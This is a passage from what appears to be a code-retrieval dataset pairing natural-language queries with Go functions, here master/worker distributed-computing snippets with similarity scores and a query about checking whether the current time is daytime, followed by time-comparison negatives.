fmt.Sprintf(\"%s:%d\",\n\t\tos.Getenv(\"PREDICTOR_SERVICE_DNS_NAME\"),\n\t\t8080)\n\tconn, err := grpc.Dial(serverAddr, grpc.WithInsecure())\n\tif err != nil {\n\t\tlogrus.Fatalf(\"fail to dial: %v\", err)\n\t}\n\tpClient := predictor.NewObiPredictorClient(conn)\n\n\t// Open connection to persistent storage\n\terr = persistent.CreatePersistentConnection()\n\tif err != nil {\n\t\tlogrus.Fatal(\"Could not connect to persistent database\")\n\t}\n\tlogrus.Info(\"Connected to persistent database\")\n\n\t// Create and return OBI master object\n\tmaster := ObiMaster {\n\t\tscheduler: scheduler,\n\t\theartbeatReceiver: hb,\n\t\tpredictorClient: &pClient,\n\t\tpriorities: priorityMap,\n\t}\n\n\t// Recover from failure by rescheduling any jobs which are still in the pending state\n\tpendingJobs, err := persistent.GetPendingJobs()\n\tif err != nil {\n\t\tlogrus.WithField(\"error\", err).Error(\"Unable to load pending jobs from database\")\n\t}\n\tfor _, job := range pendingJobs {\n\t\tmaster.scheduler.ScheduleJob(job)\n\t}\n\n\treturn &master\n}", "func NewMasterIndex() *MasterIndex {\n\t// Always add an empty final index, such that MergeFinalIndexes can merge into this.\n\t// Note that removing this index could lead to a race condition in the rare\n\t// sitation that only two indexes exist which are saved and merged concurrently.\n\tidx := []*Index{NewIndex()}\n\tidx[0].Finalize()\n\treturn &MasterIndex{idx: idx, pendingBlobs: restic.NewBlobSet()}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\t\t\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// TODO: maybe use a channel for in-process comm?\n\t// determine task state to know which master RPC to call\n\t//reply := CallRegisterIdle()\n\tvar reply *RegisterIdleReply\n\n\t//for workerInfo.State == IDLE || workerInfo.State == COMPLETED {\n\tfor {\n\n\t\tif workerInfo.State == IDLE {\n\t\t\treply = CallRegisterIdle()\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got Error!!!!!!\")\n\t\t\t}\n\t\t} else if workerInfo.State == COMPLETED {\n\t\t\treply = CallCompletedTask() // override reply\n\t\t\t//if reply != nil {\n\t\t\t//\tresetWorkerInfo()\n\t\t\t//\tworkerInfo.State = IDLE\n\t\t\t//}\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got errror!!!!!!!!\")\n\t\t\t}\n\t\t} else {\n\t\t\tworker_logger.Error(\"Shouldn't be in IN_PROGRESS state here...\")\n\t\t}\n\n\t\t// TODO: maybe don't need a mutex?\n\t\tif reply.MasterCommand == ASSIGN_TASK {\n\n\t\t\tworkerInfo.State = IN_PROGRESS\n\t\t\tworkerInfo.Id = reply.WorkerId\n\t\t\tworkerInfo.TaskType = reply.TaskType\n\t\t\tworkerInfo.TaskId = reply.TaskId\n\t\t\tworkerInfo.InputFileLoc = reply.InputFileLoc\n\t\t\tworkerInfo.NReduce = reply.NReduce\n\t\t\t//workerInfo.Progress = 0.0\n\n\t\t\t// TODO: replace this with broadcaster/observer design\n\t\t\tprogress_ch := make(chan float32)\n\t\t\tdone := make(chan struct{})\n\t\t\theartbeatStoped := make(chan struct {})\n\n\n\t\t\t// Actual computing job goroutine\n\t\t\tgo func() {\n\t\t\t\tif workerInfo.TaskType == MAP {\n\t\t\t\t\tdoMapTask(&workerInfo, mapf, progress_ch)\n\t\t\t\t} else if workerInfo.TaskType == REDUCE {\n\t\t\t\t\tdoReduceTask(&workerInfo, reducef, progress_ch)\n\t\t\t\t}/* else { // None task\n\t\t\t\t\tclose(progress_ch)\n\t\t\t\t}*/\n\n\t\t\t}()\n\n\t\t\t// Heartbeat gorountine\n\t\t\tgo func() {\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\t\tcase <-done:\n\t\t\t\t\t\t\tworker_logger.Debug(\"heartbeat job received done signal, stopping!\")\n\t\t\t\t\t\t\theartbeatStoped <- struct{}{}\n\t\t\t\t\t\t\tclose(heartbeatStoped)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tCallSendHeartbeat()\n\t\t\t\t\t\t\ttime.Sleep(1*time.Second)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}()\n\n\n\t\t\tfor progress := range progress_ch {\n\t\t\t\tworker_logger.Debug(fmt.Sprintf(\"Task(%s) progress: %f\", workerInfo.TaskId, progress))\n\t\t\t}\n\t\t\tdone <- struct{}{}\n\t\t\tclose(done)\n\t\t\t<- heartbeatStoped\n\n\t\t\t// Set result location & worker state\n\t\t\tworkerInfo.State = COMPLETED\n\n\t\t} else if reply.MasterCommand == STAND_BY {\n\t\t\tworker_logger.Debug(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\ttime.Sleep(500*time.Millisecond)\n\t\t} else if reply.MasterCommand == PLEASE_EXIT {\n\t\t\tworker_logger.Info(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\treturn\n\t\t}\n\n\t}\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func (m *Master) Start() int {\n\tgo m.input.run()\n\tfor _, workers := range m.workers {\n\t\tfor _, worker := range workers {\n\t\t\tgo worker.run()\n\t\t}\n\t}\n\tgo m.output.run()\n\treturn <-m.output.endChannel\n}", "func (m *Master) init() {\n\tfmt.Printf(\"Initializing master...\\n\")\n\tm.phase = 0\n\tm.workerIDToTaskStatusMap = make(map[int]int)\n\tm.tasks = 0\n\tm.done = false\n\tm.taskStatusList = list.New()\n\ttaskQueue := []*TaskType{}\n\tfor i, file := range m.inputFiles {\n\t\tmapTask := TaskType{i, 0, m.nReduceTasks, []string{file}}\n\t\ttaskQueue = append(taskQueue, &mapTask)\n\t\tm.tasks++\n\t\tfmt.Printf(\"Generating Map Task: %#v\\n\", mapTask)\n\t}\n\tm.taskQueue = taskQueue\n\tgo m.checkProgress()\n}", "func main(){\n\tmc := master.LoadConfig()\n\terrList := master.Start(mc.Num_instances, mc.Selection_config, mc.Ports)\n\tfor i, err := range errList {\n\t\tlog.Println(\"ERR: \", i, \"th master terminated with error: \", err)\n\t}\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor {\n\t\targs := RPCArgs{}\n\t\treply := RPCReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\t\tswitch reply.TaskInfo.TaskType {\n\t\tcase Map:\n\t\t\tdoMap(&reply.TaskInfo, mapf)\n\t\tcase Reduce:\n\t\t\tdoReduce(&reply.TaskInfo, reducef)\n\t\tcase Wait:\n\t\t\tfmt.Println(\"Waiting task\")\n\t\t\ttime.Sleep(time.Second)\n\t\t\tcontinue\n\t\tcase Done:\n\t\t\tfmt.Println(\"All task done\")\n\t\t\treturn\n\t\t}\n\t\targs.TaskInfo = reply.TaskInfo\n\t\tcall(\"Master.TaskDone\", &args, &reply)\n\t}\n}", "func MakeClerk(masters []*labrpc.ClientEnd, make_end func(string) *labrpc.ClientEnd) *Clerk {\n\tck := new(Clerk)\n\t//Creates a shardmaster linked to this client. Masters includes all other shardmasters. \n\tck.sm = shardmaster.MakeClerk(masters)\n\tck.make_end = make_end\n\t// You'll have to add code here.\n\n\tck.currentLeader = make(map[int]int)\n\tck.clientID = nrand()\n\tck.currentRPCNum = 0\n\tck.debug = -1\n\n\treturn ck\n}", "func (m *ParallelMaster) Merge() string {\n\tmergeReduceOutputs(m.JobName, m.NumReducers)\n\treturn MergeOutputName(m.JobName)\n}", "func StartWorker(configFile *goconf.ConfigFile) {\n\n\tGoMaxProc(\"worker\", configFile)\n\tConBufferSize(\"worker\", configFile)\n\tprocesses, err := configFile.GetInt(\"worker\", \"processes\")\n\tif err != nil {\n\t\tlogger.Warn(err)\n\t\tprocesses = 3\n\t}\n\tmasterhost := GetRequiredString(configFile, \"worker\", \"masterhost\")\n\tlogger.Printf(\"StartWorker() [%v, %d]\", masterhost, processes)\n\tRunNode(processes, masterhost)\n}", "func StartMaster(master *Master, done chan<- bool) error {\n\tl, err := net.Listen(\"unix\", master.sockFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// send signal to chan\n\tdone <- true\n\tgo sigchldHandler(func(pid int) {\n\t\tf := NewFFlags(master.rootPath)\n\t\t// find instance of corresponding pid\n\t\tfor procSign, w := range master.workers {\n\t\t\tif w.Process.Pid == pid {\n\t\t\t\tf.SetForTerminated(procSign)\n\t\t\t\tinst, ok := master.instances[procSign]\n\t\t\t\t// to prevent instances updated/deleted\n\t\t\t\tif ok {\n\t\t\t\t\tretryCount := f.ReadRetryCount(procSign)\n\t\t\t\t\tif inst.autoRestart {\n\t\t\t\t\t\tif inst.maxRetry == 0 || retryCount <= inst.maxRetry {\n\t\t\t\t\t\t\tgo restartHandler(master, procSign)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\treturn master.server.Serve(l)\n}", "func NewMasterNode() *MasterNode {\n\tcurrentNode := MasterNode{}\n\tcurrentNode.Slaves = make(map[*websocket.Conn]bool)\n\tcurrentNode.broadcast = make(chan []byte)\n\treturn &currentNode\n}", "func NewCfnMaster_Override(c CfnMaster, scope awscdk.Construct, id *string, props *CfnMasterProps) {\n\t_init_.Initialize()\n\n\t_jsii_.Create(\n\t\t\"monocdk.aws_guardduty.CfnMaster\",\n\t\t[]interface{}{scope, id, props},\n\t\tc,\n\t)\n}", "func main() {\n\ts := master.New()\n\tif err := s.Run(port); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor{\n\t\tgetNext := GetTask(mapf, reducef)\n\t\tif(!getNext){\n\t\t\tbreak\n\t\t}\n\t}\n\t\n}", "func master(task Task, name string, y, x, p interface{}, userargs []string, cmdout, cmderr io.Writer, jobout, joberr bool) error {\n\tn := reflect.ValueOf(x).Len()\n\n\t// Open port for server.\n\tl := listenRetry(\"tcp\", addrStr)\n\tdefer l.Close()\n\n\t// Start server.\n\ttodo := make(chan int)\n\tgo func(n int) {\n\t\t// Thread-safely obtain task IDs.\n\t\tfor i := 0; i < n; i++ {\n\t\t\ttodo <- i\n\t\t}\n\t}(n)\n\tdsts := make(chan interface{})\n\tgo func(n int) {\n\t\t// Thread-safely call NewOutput().\n\t\tfor i := 0; i < n; i++ {\n\t\t\tdsts <- task.NewOutput()\n\t\t}\n\t}(n)\n\terrs := make(chan error)\n\tgo serve(l, task, name, y, x, p, todo, dsts, errs)\n\n\t// Submit job.\n\targs := []string{\"-dstrfn.task\", name, \"-dstrfn.addr\", addrStr}\n\tproc := make(chan error)\n\tgo func() {\n\t\tproc <- submit(n, userargs, args, name, cmdout, cmderr, jobout, joberr)\n\t}()\n\n\t// Wait for all tasks to finish.\n\t// Do not exit if one task fails.\n\tvar (\n\t\tnum int\n\t\tfirst error\n\t\texit bool\n\t)\n\tfor num < n && !exit {\n\t\tselect {\n\t\tcase err := <-errs:\n\t\t\tif err != nil && first == nil {\n\t\t\t\tfirst = err\n\t\t\t}\n\t\t\tn++\n\t\tcase err := <-proc:\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\texit = true\n\t\t}\n\t}\n\tif first != nil {\n\t\treturn first\n\t}\n\treturn nil\n}", "func makeWorkers(t *testing.T, n int, pool *string) []*types.Component {\n\tt.Helper()\n\tvar components []*types.Component\n\n\tif n < 1 {\n\t\treturn components\n\t}\n\n\tcomponents = append(components, types.NewComponent(testContainerImage, types.ServerComponent))\n\n\tfor i := n - 1; i > 0; i-- {\n\t\tcomponents = append(components, types.NewComponent(testContainerImage, types.ClientComponent))\n\t}\n\n\tif pool != nil {\n\t\tfor _, c := range components {\n\t\t\tc.PoolName = *pool\n\t\t}\n\t}\n\n\treturn components\n}" ]
[ "0.8261484", "0.8238458", "0.8148093", "0.80947137", "0.8092807", "0.8089421", "0.80650294", "0.80432916", "0.8039373", "0.8032846", "0.8027626", "0.79940253", "0.7988203", "0.79579335", "0.79458636", "0.7905601", "0.7896114", "0.78781605", "0.7851", "0.78498274", "0.7843989", "0.7835638", "0.7828891", "0.78170764", "0.7794136", "0.7774265", "0.7765013", "0.77395546", "0.77073324", "0.73450845", "0.6925516", "0.6848837", "0.60994345", "0.5971724", "0.59109956", "0.58068055", "0.5757619", "0.5719458", "0.56912446", "0.5666042", "0.5642508", "0.5628657", "0.5590486", "0.5541472", "0.55183", "0.5486879", "0.54843324", "0.54685515", "0.54614425", "0.54542565", "0.53947604", "0.5389726", "0.53895366", "0.53484076", "0.5314926", "0.53109777", "0.5309959", "0.53050953", "0.530063", "0.5266989", "0.52653563", "0.5265233", "0.51944166", "0.5168804", "0.5121572", "0.5098393", "0.5083662", "0.50777745", "0.5069047", "0.50645924", "0.50645924", "0.5063027", "0.5063004", "0.50590986", "0.5058379", "0.5036379", "0.503417", "0.50239915", "0.5015085", "0.49716598", "0.4937018", "0.49253675", "0.48918554", "0.4885169", "0.48763627", "0.48676172", "0.48452112", "0.48436785", "0.48367533", "0.48299646", "0.48229492", "0.4816759", "0.48053107", "0.4795447", "0.4749192", "0.47317478", "0.47278875", "0.47159728", "0.47148508", "0.47097263" ]
0.77630055
27
check if current time is during day
func isBright() bool { now := time.Now() if now.After(sunriseTime) && now.Before(sunsetTime) { return true } return false }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func whichPartOfDayIsNow() {\n\tswitch {\n\tcase time.Now().Hour() < 12:\n\t\tfmt.Println(\"Good morning!\")\n\tcase time.Now().Hour() < 17:\n\t\tfmt.Println(\"Good afternoon!\")\n\tdefault:\n\t\tfmt.Println(\"Good evening!\")\n\n\t}\n}", "func IsAfternoon() bool {\n localTime := time.Now()\n return localTime.Hour() <= 18\n}", "func IsEvening() bool {\n localTime := time.Now()\n return localTime.Hour() <= 22\n}", "func (c *CaltrainClient) isForToday(day string, ref string) bool {\n\tweekdays, ok := c.dayService[ref]\n\tif !ok {\n\t\treturn false\n\t}\n\tfor _, d := range weekdays {\n\t\tif d == day {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func main() {\n t := time.Now()\n switch {\n case t.Hour() < 12:\n fmt.Println(\"Good morning\")\n case t.Hour() < 17:\n fmt.Println(\"Good afternoon\")\n default:\n fmt.Println(\"wtf, what time it is\")\n }\n}", "func (d Day) Includes(t time.Time) bool {\n\treturn d.normalize(t) == t.Day()\n}", "func IsAfternoonAppointment(date string) bool {\n\tvar t time.Time = Schedule(date)\n\tlog.Println(\"Hours: \", t.Hour(), \"Minute: \", t.Minute())\n\tif t.Hour() >= 12 && t.Hour() < 18 {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (w *wrapper) isInActiveTimeWindow() bool {\n\tif !w.activeWindow {\n\t\treturn true\n\t}\n\n\tnowT := time.Now().In(w.timezone)\n\tnow := nowT.Hour()*60 + nowT.Minute()\n\tif w.from > w.to {\n\t\treturn now <= w.to || now >= w.from\n\t}\n\n\treturn w.from <= now && now <= w.to\n}", "func (w *Week) canAddNewDay(time string) bool {\n\tfor _, v := range w.days {\n\t\tif v == time {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}", "func (me TdurationType) IsDay() bool { return me.String() == \"day\" }", "func (me TimePeriod) IsOneDay() bool { return me.String() == \"OneDay\" }", "func testTime24h(modtime time.Time) bool {\n\ttimediff := time.Now().Sub(modtime).Hours()\n\tvar result bool\n\tif timediff > 24 {\n\t\tresult = true\n\t} else {\n\t\tresult = false\n\t}\n\treturn result\n}", "func TestInitialDateTimeChecks4(t *testing.T) {\n\n\texpected := true\n\n\tcurrDate := time.Now().Add(24 * time.Hour).Format(\"2006-01-02\")\n\tactual, _ := restaurantBooking.InitialDateTimeChecks(currDate, \"15:00\")\n\n\tif actual != expected {\n\t\tt.Fail()\n\t}\n\n}", "func IsAM() bool {\n localTime := time.Now()\n return localTime.Hour() <= 12\n}", "func CheckTime(liveHours string) {\n\tif liveHours != \"\" {\n\t\tallowedTime := strings.Split(liveHours, \"-\")\n\t\tstartTime := strings.Split(allowedTime[0], \":\")\n\t\tendTime := strings.Split(allowedTime[1], \":\")\n\t\tcurrent := time.Now()\n\t\tstartHour, _ := strconv.Atoi(startTime[0])\n\t\tstartMin, _ := strconv.Atoi(startTime[1])\n\t\tendHour, _ := strconv.Atoi(endTime[0])\n\t\tendMin, _ := strconv.Atoi(endTime[1])\n\t\tstart := time.Date(current.Year(), current.Month(), current.Day(), startHour, startMin, current.Second(), current.Nanosecond(), current.Location())\n\t\tend := time.Date(current.Year(), current.Month(), current.Day(), endHour, endMin, current.Second(), current.Nanosecond(), current.Location())\n\t\tif current.After(start) && current.Before(end) {\n\t\t\treturn\n\t\t} else {\n\t\t\ttime.Sleep(start.Sub(current))\n\t\t\treturn\n\t\t}\n\t}\n}", "func checkEvery(startDate, atDate time.Time, every int) bool {\n\t// every must not be 0\n\tif every == 0 {\n\t\tevery = 1\n\t}\n\n\tdiff := startDate.Sub(atDate)\n\thrsDiff := int(diff / (time.Hour)) // assures a discrete hour value\n\treturn (hrsDiff % every) == 0\n}", "func (v Value) IsActiveForTime(time int64) bool {\n\treturn time >= v.StartSeconds && time < v.EndSeconds\n}", "func (c CurrentTime) GetCurrentDayAndTime() time.Time {\n\treturn time.Now()\n}", "func isZeroTime(t time.Time) bool {\n\treturn t.IsZero() || t.Equal(zeroTime)\n}", "func (me TimePeriod) IsLifeToDate() bool { return me.String() == \"LifeToDate\" }", "func EvaluateSameDay(app string) bool {\n\tcurrent := time.Now()\n\tconst shortForm = \"2006-Jan-02\"\n\tt, _ := time.Parse(time.RFC3339, app)\n\tif current.Format(shortForm) == t.Format(shortForm) {\n\t\treturn true\n\t}\n\n\treturn false\n\n}", "func (wd Weekday) Includes(t time.Time) bool {\n\treturn t.Weekday() == time.Weekday(wd)\n}", "func AutoScaleByTime(calendar *[]AutoScalingCalender, timeNow time.Time)bool{\n\tfor _, val := range *calendar{\n\t\t// find the matching weekday\n\t\tif val.weekday == timeNow.Weekday() {\n\t\t\t// always turns on for the whole up date\n\t\t\tif val.wholeDayOn {return true}\n\t\t\t// two case:\n\t\t\t// 1. start and end time on the same date,\n\t\t\t// 2. start one day and end on the other date\n\n\t\t\t// same date\n\t\t\tif val.startHour < val.endHour {\n\t\t\t\tif timeNow.Hour() < val.endHour && timeNow.Hour() >= val.startHour {return true}\n\t\t\t\treturn false\n\t\t\t} else if val.startHour > val.endHour {\n\t\t\t\t// midnight between start and end hours\n\t\t\t\tif timeNow.Hour() >= val.startHour || timeNow.Hour() < val.endHour {return true}\n\t\t\t\treturn false\n\t\t\t}\n\t\t}\n\t}\n\treturn false\n}", "func Now() time.Time {\n\tmu.Lock()\n\tdefer mu.Unlock()\n\tvar now time.Time\n\tif testMode {\n\t\tnow = testNow()\n\t} else {\n\t\tnow = time.Now()\n\t}\n\treturn now.In(localtz.Get())\n}", "func IsTimeExpiredInTime(tt time.Time, offsetInSeconds float64) bool {\n\tremainder := tt.Sub(time.Now())\n\tlog.Info(\"remainder: %v calc : %v\", remainder, (remainder.Seconds() + offsetInSeconds))\n\n\treturn !((remainder.Seconds() + offsetInSeconds) > 0)\n}", "func CheckTimeIn(t time.Time, from time.Time, to time.Time) bool {\n\treturn (t.Equal(from) || t.After(from)) && (t.Equal(to) || t.Before(to))\n}", "func (t *Task) MarkDoneForToday() {\n t.SnoozedUntil = floorDate(time.Now().Add(time.Hour * 24))\n}", "func switchWithOutCondition()(){\n\n t := time.Now()\n switch {\n case t.Hour() < 12:\n fmt.Println(\"It's before noon\")\n default:\n fmt.Println(\"It's after noon\")\n }\n\n}", "func IsAfternoonAppointment(date string) bool {\n\tt, err := time.Parse(\"Monday, January 2, 2006 15:04:05\", date)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\th := t.Hour()\n\treturn h >= 12 && h < 18\n}", "func IsSameDay(date1, date2 time.Time) bool {\n\ty1, m1, d1 := date1.Date()\n\ty2, m2, d2 := date2.Date()\n\treturn y1 == y2 && m1 == m2 && d1 == d2\n}", "func (c *Cron) now() time.Time {\n\treturn time.Now().In(c.location)\n}", "func IsAfternoonAppointment(date string) bool {\n\tlayout := \"Monday, January 2, 2006 15:04:05\"\n\thour := ConvertToTime(layout, date).Hour()\n\treturn hour >= 12 && hour < 18\n}", "func getToday() time.Time {\n\treturn time.Now().UTC()\n}", "func isDateTimeWithinTimeRange(dateTime time.Time, timeRange *timeRange) bool {\n\ttodayHr := dateTime.Hour()\n\ttodayMin := dateTime.Minute()\n\tstartHr := timeRange.fromTime.Hour()\n\tstartMin := timeRange.fromTime.Minute()\n\tendHr := timeRange.toTime.Hour()\n\tendMin := timeRange.toTime.Minute()\n\tif (todayHr < startHr || todayHr > endHr) ||\n\t\t(todayHr == startHr && todayMin < startMin) ||\n\t\t(todayHr == endHr && todayMin > endMin) {\n\t\treturn false\n\t}\n\treturn true\n}", "func allowedInCity(lastDigit int, dateTime time.Time) bool {\n\tallowed := true\n\n\tweekday := dateTime.Weekday()\n\tdateString := dateTime.Format(\"2006-01-02\")\n\n\tmorningRestrictionStart, _ := time.Parse(time.RFC3339, dateString + \"T\" + \"07:00:00-05:00\")\n\tmorningRestrictionEnd, _ := time.Parse(time.RFC3339, dateString + \"T\" + \"09:30:00-05:00\")\n\n\teveningRestrictionStart, _ := time.Parse(time.RFC3339, dateString + \"T\" + \"16:00:00-05:00\")\n\teveningRestrictionEnd, _ := time.Parse(time.RFC3339, dateString + \"T\" + \"19:30:00-05:00\")\n\n\trestrictedMorningTime := dateTime.After(morningRestrictionStart) && dateTime.Before(morningRestrictionEnd)\n\trestrictedEveningTime := dateTime.After(eveningRestrictionStart) && dateTime.Before(eveningRestrictionEnd)\n\n\tif restrictedMorningTime || restrictedEveningTime {\n\t\tswitch weekday {\n\t\tcase time.Monday:\n\t\t\tif lastDigit == 1 || lastDigit == 2 {\n\t\t\t\tallowed = false\n\t\t\t}\n\t\tcase time.Tuesday:\n\t\t\tif lastDigit == 3 || lastDigit == 4 {\n\t\t\t\tallowed = false\n\t\t\t}\n\t\tcase time.Wednesday:\n\t\t\tif lastDigit == 5 || lastDigit == 6 {\n\t\t\t\tallowed = false\n\t\t\t}\n\t\tcase time.Thursday:\n\t\t\tif lastDigit == 7 || lastDigit == 8 {\n\t\t\t\tallowed = false\n\t\t\t}\n\t\tcase time.Friday:\n\t\t\tif lastDigit == 9 || lastDigit == 0 {\n\t\t\t\tallowed = false\n\t\t\t}\n\t\t}\n\t}\n\n\treturn allowed\n}", "func DateIsEqualTo(t1 time.Time, year int, month time.Month, day int) bool {\n\treturn t1.Day() == day && t1.Month() == month && t1.Year() == year\n}", "func (e Entry) Match(t time.Time) bool {\n\tt = t.In(e.Location)\n\n\treturn e.minute.match(t.Minute()) &&\n\t\te.hour.match(t.Hour()) &&\n\t\te.dom.match(t.Day()) &&\n\t\te.dow.match(int(t.Weekday())) &&\n\t\te.month.match(int(t.Month()))\n}", "func DayInRange(time *time.Time, minDay, maxDay int) bool {\n\treturn fieldInRange(time.Day, minDay, maxDay)\n}", "func (m *MaintenanceScheduler) between(event *Event) (bool, error) {\n\tnow := time.Now()\n\thh, mm, ss := now.Clock()\n\ttnow, err := time.Parse(tfmt, fmt.Sprintf(\"%s:%s:%s\", leadZero(hh), leadZero(mm), leadZero(ss)))\n\tif err != nil {\n\t\treturn false, errors.Wrap(err, \"unable to parse current time\")\n\t}\n\tday := strings.ToLower(now.Weekday().String())\n\tschedule, ok := event.Schedules[day]\n\tif !ok {\n\t\treturn false, nil\n\t}\n\tstime, err := time.Parse(tfmt, schedule.StartFmt)\n\tif err != nil {\n\t\treturn false, errors.Wrap(err, \"unable to parse start time\")\n\t}\n\tetime, err := time.Parse(tfmt, schedule.EndFmt)\n\tif err != nil {\n\t\treturn false, errors.Wrap(err, \"unable to parse end time\")\n\t}\n\tif !(tnow.After(stime) && tnow.Before(etime)) {\n\t\treturn false, nil\n\t}\n\treturn true, nil\n}", "func checkDate(date time.Time) bool {\n\tminDate := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC)\n\tmaxDate := time.Date(2200, 1, 1, 0, 0, 0, 0, time.UTC)\n\tif date.Before(minDate) || date.After(maxDate) {\n\t\treturn false\n\t}\n\treturn true\n}", "func isDST(t time.Time) bool {\n\tname, _ := t.In(locNewYork).Zone()\n\treturn name == \"EDT\"\n}", "func InTheFuture(ctx context.Context, t time.Time) bool {\n\tnow, err := BlockTime(ctx)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"%+v\", err))\n\t}\n\treturn t.After(now)\n}", "func TestClock_Now(t *testing.T) {\n\tnow := raft.NewClock().Now()\n\tif exp := time.Now(); exp.Sub(now) > 1*time.Second {\n\t\tt.Fatalf(\"clock time is different than wall time: exp=%v, got=%v\", exp, now)\n\t}\n}", "func Now() time.Time {\n\treturn time.Now().In(_defaultLocation)\n}", "func timesEqual(scheduled *storagetransfer.TimeOfDay, desired flagx.Time) bool {\n\treturn fmtTime(scheduled) == desired.String()\n}", "func DayIsEqual(t1, t2 time.Time) bool {\n\treturn t1.Day() == t2.Day()\n}", "func (s *EventDatabase) CheckIfTimeIsBusy(ctx context.Context, event *eventapi.Event) error {\n\tif err := s.verifyConnection(ctx); err != nil {\n\t\treturn err\n\t}\n\tvar err error\n\tintUUID := 0\n\tif event.Uuid != \"\" {\n\t\tintUUID, err = strconv.Atoi(event.Uuid)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(repository.ErrInvalidData, \"invalid uuid data\")\n\t\t}\n\t}\n\trs, err := s.Database.NamedQueryContext(ctx,\n\t\t`select count(*) as count from calendar.event where\n\t\t\tuuid!=:uuid and username=:username and deleted=false \n\t\t\tand (\n\t\t\t\t(:start_time>=start_time and :start_time<start_time + duration * interval '1 minute') \n\t\t\t\tor \n\t\t\t\t(:end_time>start_time and :end_time<=start_time + duration * interval '1 minute')\n\t\t\t)`,\n\t\tmap[string]interface{}{\n\t\t\t\"uuid\": intUUID,\n\t\t\t\"username\": event.Username,\n\t\t\t\"start_time\": event.StartTime,\n\t\t\t\"end_time\": event.StartTime.Add(time.Duration(event.Duration) * time.Minute),\n\t\t})\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"could not execute check time statement\")\n\t}\n\tif rs.Next() {\n\t\tvar count int64\n\t\terr := rs.Scan(&count)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"could not parse select result\")\n\t\t}\n\t\tif count != 0 {\n\t\t\treturn repository.ErrDateBusy\n\t\t}\n\t\treturn nil\n\t}\n\treturn errors.New(\"could not get select result\")\n}", "func isBusinessDay(date time.Time) bool {\n\tweekday := date.Weekday()\n\treturn !(weekday == time.Saturday || weekday == time.Sunday)\n}", "func BeginningOfToday() time.Time {\n\treturn BeginningOfDay(time.Now())\n}", "func Now() time.Time {\n\treturn time.Now().In(LOCATION)\n}", "func IsZeroTime(t time.Time) bool {\n\treturn t.IsZero() || t.Equal(unixEpochTime)\n}", "func OnInterval(t time.Time) bool {\n\tt = t.UTC()\n\treturn t.Minute() % 15 == 0 && t.Second() % 60 == 0\n}", "func (v Value) IsExpiredForTime(time int64) bool {\n\treturn time >= v.EndSeconds\n}", "func todayIsReportCheckDay(today string) bool {\n\tallowedDays := strings.Split(os.Getenv(\"DAYS_FOR_REPORT_CHECK\"), \",\")\n\treturn utils.Contains(allowedDays, today)\n}", "func handleMidnight(t time.Time) time.Time {\n if t.Hour() == 0 {\n t = t.Add(time.Minute)\n }\n return t\n}", "func DayInList(time *time.Time, days []int) bool {\n\treturn fieldInList(time.Day, days)\n}", "func IsBusinessDay(t time.Time) bool {\n\tt = t.In(jst)\n\treturn !IsHoliday(t)\n}", "func IsWorkingDay(date time.Time) (bool, error) {\n\terr := checkInitBook()\n\tif err != nil {\n\t\treturn false, err\n\t}\n\n\treturn b.isWorkingday(date), nil\n}", "func SameTime(a, b time.Time) bool {\n\treturn a.Unix() == b.Unix()\n}", "func InThePast(ctx context.Context, t time.Time) bool {\n\tnow, err := BlockTime(ctx)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"%+v\", err))\n\t}\n\treturn t.Before(now)\n}", "func TimeIsEqualTo(t1 time.Time, hour, min, sec int, nsec ...int) bool {\n\tnsecs := true\n\tif nsec != nil {\n\t\tnsecs = t1.Nanosecond() == nsec[0]\n\t}\n\treturn t1.Hour() == hour && t1.Minute() == min && t1.Second() == sec && nsecs\n}", "func ZeroTime(t time.Time) bool {\n\tif t == (time.Time{}) {\n\t\treturn true\n\t}\n\treturn false\n}", "func checkTimeValid(id ulid.ULID) error {\n\tcurTime := time.Now()\n\ttime2 := time.Unix(int64(id.Time()), 0)\n\n\tif uint64(curTime.Sub(time2).Minutes()) > WORKERIDEXPIRE {\n\t\treturn fmt.Errorf(fmt.Sprintf(\"time has lapsed, diff=%v\", curTime.Sub(time2).Seconds()))\n\t}\n\treturn nil\n}", "func timeGreeting() {\n\tt := time.Now()\n\tswitch {\n\tcase t.Hour() < 12:\n\t\tfmt.Println(\"Good morning!\")\n\tcase t.Hour() < 17:\n\t\tfmt.Println(\"Good afternoon.\")\n\tdefault:\n\t\tfmt.Println(\"Good evening.\")\n\t}\n}", "func TestInitialDateTimeChecks3(t *testing.T) {\n\n\texpected := false\n\n\tcurrDate := time.Now().Format(\"2006-01-02\")\n\tbeforeRestaurantOpenCheck, _ := 